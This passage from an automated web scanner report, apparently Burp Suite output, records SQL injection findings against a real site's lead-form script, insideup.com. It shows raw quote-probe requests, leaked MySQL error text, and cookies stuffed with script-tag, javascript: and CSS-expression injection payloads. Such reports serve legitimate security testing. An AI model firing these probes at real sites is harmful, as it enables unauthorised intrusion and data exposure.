OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e21rvchfcmhpu42f6vneh9lst7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.285. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qs66bkkt2ehuoomlmt0kj5abm2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2936__Financial statement creation&attributeId_453=2944__No - No preference&a' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7rhhvqraiq362epguu6b0msi62; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.286. http://www.insideup.com/ppc/leadflow/fist00/project.php [attributeId_452%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The attributeId_452%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_452%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation'&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ti84504g1am5o7b3bk48t7q1g6; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'preference&attributeId_454=2948__Not sure&attributeId_455=2955__ASAP&attributeId' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation''&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 